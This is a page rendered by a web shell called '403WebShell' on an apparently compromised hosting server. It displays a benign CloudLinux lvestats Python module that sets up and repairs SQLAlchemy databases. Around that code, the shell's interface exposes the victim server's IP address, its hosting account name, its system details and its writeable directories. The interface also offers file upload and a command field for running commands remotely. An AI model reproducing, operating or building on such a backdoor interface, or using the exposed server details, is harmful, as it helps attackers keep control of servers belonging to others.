Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.219.81.129
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib//dbengine.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import logging
import pathlib

import sqlalchemy.engine
from sqlalchemy import delete, func
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.engine.url import make_url
from sqlalchemy.ext.declarative.clsregistry import _ModuleMarker
from sqlalchemy.orm import RelationshipProperty, sessionmaker

from clcommon import mysql_lib
from clcommon.clexception import FormattedException
from lvestats.orm import Base, history
from lvestats.orm import LVE_STATS_2_TABLENAME_PREFIX
from lvestats.utils.dbmigrator import alembic_migrate

DEFAULT_DB_PATH = '/var/lve/lvestats2.db'
MYSQL, POSTGRESQL, SQLITE = 'mysql', 'postgresql', 'sqlite'
SUPPORTED_DATABASES = [MYSQL, POSTGRESQL, SQLITE]
DB_CLIENT_LIBRARY_MAP = {
    MYSQL: 'pymysql',
    POSTGRESQL: 'psycopg2',
}

__author__ = 'shaman'


def find_not_existing_tables_or_views(engine, names):
    """
    Checks if views exist.
    :param sqlalchemy.engine.base.Engine engine:
    :return:
    """
    inspector = Inspector.from_engine(engine)
    existing = set(inspector.get_view_names())
    not_existing = {LVE_STATS_2_TABLENAME_PREFIX + n for n in names} - existing
    return tuple(x.replace(LVE_STATS_2_TABLENAME_PREFIX, '') for x in tuple(not_existing))


def get_list_of_tables_without_views():
    """
    Used to call engine.create_all() without views that are described as Table()
    :return:
    """
    tables = dict(Base.metadata.tables).values()
    tables_for_disabled_features = []

    burstable_limits_feature_flag = '/opt/cloudlinux/flags/enabled-flags.d/burstable-limits.flag'
    if not pathlib.Path(burstable_limits_feature_flag).exists():
        tables_for_disabled_features.append(LVE_STATS_2_TABLENAME_PREFIX + 'bursting_events')

    return [t for t in tables if t.name not in tables_for_disabled_features]


class MakeDbException(FormattedException):
    pass


class DatabaseConfigError(FormattedException):
    pass


def cfg_get_uri(cfg, check_support=True):
    """
    Extract and validate database connection uri from config
    :param dict cfg:
    :param bool check_support:
    :return str:
    """
    # check present "db_type"
    db_type = cfg.get('db_type')
    if db_type is None:
        raise DatabaseConfigError(
            {'message': '"%(config_variable)s" not in config', 'context': {'config_variable': 'db_type'}}
        )

    # check supported databases
    if check_support and db_type not in SUPPORTED_DATABASES:
        raise DatabaseConfigError(
            {
                'message': 'Incorrect database type %(database_type)s. You should only use %(database_types)s. '
                'The correct db_type for mariadb is "mysql"',
                'context': {'database_type': db_type, 'database_types': '", "'.join(SUPPORTED_DATABASES)},
            }
        )

    # check present "connect_string"
    connect_string = cfg.get('connect_string')
    if db_type != SQLITE and connect_string is None:
        raise DatabaseConfigError(
            {'message': '"%(config_variable)s" not in config', 'context': {'config_variable': 'connect_string'}}
        )

    # generate database uri
    if db_type == SQLITE:
        uri = f'{db_type}:///{cfg.get("sqlite_db_path", DEFAULT_DB_PATH)}'
    else:
        client_library = get_db_client_library_name(db_type)
        uri = f'{db_type}+{client_library}://{connect_string}'
        uri = get_fixed_uri(db_type, uri)
    return uri


def make_db_engine(cfg, just_print=False, debug=False, pool_class=None, check_support=True):
    """
    Create sqlalchemy database engine
    :param dict cfg:
    :param bool just_print:
    :param bool debug:
    :param pool_class:
    :param bool check_support:
    :return:
    """
    log = logging.getLogger('init_db_engine')

    try:
        connect_string = cfg_get_uri(cfg, check_support=check_support)
    except DatabaseConfigError as e:
        msg = 'Unable to configure database connection. %(error)s'
        context = {'error': str(e)}
        log.error(msg, context)
        raise MakeDbException({'message': msg, 'context': context}) from e

    log.info('Connecting to database: %s', cfg['db_type'])

    if debug is False and 'debug' in cfg:
        debug = cfg['debug']

    if just_print:
        def dump(sql, *multiparams, **params):
            print(sql)

        engine = sqlalchemy.engine.create_engine(connect_string, strategy='mock', executor=dump)
    else:
        engine = sqlalchemy.engine.create_engine(connect_string, echo=debug, poolclass=pool_class)

    return engine


def validate_database(engine, hide_logging=False, base=Base):
    log = logging.getLogger('validate_database')
    if hide_logging:
        log.propagate = False
        log.addHandler(logging.NullHandler())
    result = {"table_error": False, "column_error": False, "missing_tables": [], "orm_tables": []}
    database_inspection = Inspector.from_engine(engine)
    real_tables = database_inspection.get_table_names()
    for _, _class in list(base._decl_class_registry.items()):  # pylint: disable=protected-access
        if isinstance(_class, _ModuleMarker):
            continue
        table = _class.__tablename__
        result['orm_tables'].append(table)
        if table in real_tables:
            real_columns = [c["name"] for c in database_inspection.get_columns(table)]
            mapper = sqlalchemy.inspect(_class)
            for column_prop in mapper.attrs:
                if isinstance(column_prop, RelationshipProperty):
                    # We have no relationships
                    pass
                else:
                    for column in column_prop.columns:
                        if column.key not in real_columns:
                            log.critical(
                                "Model %s declares column %s which does not exist in database %s",
                                _class,
                                column.key,
                                engine,
                            )
                            result["column_error"] = True
        else:
            log.critical("Model %s declares table %s which does not exist in database %s", _class, table, engine)
            result["table_error"] = True
            result["missing_tables"].append(table)
    if result["table_error"]:
        log.critical("You can run 'lve-create-db --create-missing-tables' command to recreate missing tables.")
    if result["column_error"]:
        log.critical("You can try to recreate malformed table, or ask CloudLinux support for help.")
    return result


def check_need_create_db(engine):
    inspect_result = validate_database(engine, hide_logging=True)
    return inspect_result['missing_tables'] == inspect_result['orm_tables']


def create_db(engine):
    Base.metadata.create_all(engine, tables=get_list_of_tables_without_views())
    # write revision version to database only after create all tables
    alembic_migrate(engine, stamp=True)


def setup_db(engine, create_missing_tables=False, cfg=None):
    if create_missing_tables or check_need_create_db(engine):
        create_db(engine)
    else:
        alembic_migrate(engine, lve_stats_cfg=cfg)


def drop_tables(engine):
    Base.metadata.drop_all(engine)


def clear_rows(engine, server_id=None):
    conn_ = engine.connect()
    trans = conn_.begin()  # delete all rows in one transaction
    try:
        for _, table_object in list(Base.metadata.tables.items()):
            if server_id is None:
                delete_query = delete(table_object)
            elif isinstance(server_id, (list, tuple)):
                delete_query = delete(table_object, table_object.c.server_id in server_id)
            else:
                delete_query = delete(table_object, table_object.c.server_id == server_id)
            conn_.execute(delete_query)
        trans.commit()
    except Exception:
        trans.rollback()
        raise


def recreate_db(engine):
    drop_tables(engine)
    create_db(engine)


def find_lost_keep_alive(session, server_id, from_timestmp=None, to_timestamp=None):
    # query for find timestmps with lost keepalive records
    # SELECT created FROM lve_stats2_history WHERE server_id = 'server_id'
    # GROUP BY created HAVING max(id) > 0 AND min(id) > 0
    lost_keepalive = (
        session.query(history.created)
        .filter(history.server_id == server_id)
        .group_by(history.created)
        .having(func.max(history.id) > 0)
        .having(func.min(history.id) > 0)
    )
    if to_timestamp is not None:
        lost_keepalive = lost_keepalive.filter(history.created <= to_timestamp)
    if from_timestmp is not None:
        lost_keepalive = lost_keepalive.filter(history.created >= from_timestmp)
    return [record_[0] for record_ in lost_keepalive]


def fix_lost_keep_alive(session, server_id, from_timestmp=None, to_timestamp=None, log_=None):
    lost_keep_alive = find_lost_keep_alive(session, server_id, from_timestmp, to_timestamp)
    if not lost_keep_alive:
        return
    # add losted keep alive records
    v2_keepalive_row = {col: 0 for col in list(history.__table__.columns.keys())}
    v2_keepalive_row[history.server_id.key] = server_id

    for timestamp in lost_keep_alive:
        history_keepalive = history(**v2_keepalive_row)
        history_keepalive.created = timestamp  # setup timestamp
        session.add(history_keepalive)
    session.commit()
    if log_:
        log_.info('Was fixed %s losted keep alive records: %s', len(lost_keep_alive), lost_keep_alive)


def fix_db(engine, cfg, from_timestmp=None, to_timestamp=None, log_=None):
    # autocommit=True using for clear cache in mariadb between queries
    session = sessionmaker(bind=engine)()
    fix_lost_keep_alive(session, cfg['server_id'], from_timestmp=from_timestmp, to_timestamp=to_timestamp, log_=log_)
    session.close()


def get_db_client_library_name(db_type):
    """
    Get database Python client library name
    :param str db_type:
    :return str:
    """
    client_library = DB_CLIENT_LIBRARY_MAP.get(db_type)
    if client_library is None:
        raise DatabaseConfigError(
            {
                'message': 'The client library to connect to the "%(database_type)s" ' 'database cannot be detected',
                'context': {
                    'database_type': db_type,
                },
            }
        )
    return client_library


def get_fixed_uri(db_type, uri):
    """
    Get fixed URI for the specified database
    :param str db_type:
    :param str uri:
    :return str:
    """
    if db_type != MYSQL:
        return uri

    u = make_url(uri)
    return str(mysql_lib.get_rfc1738_db_uri(u))

Youez - 2016 - github.com/yon3zu
LinuXploit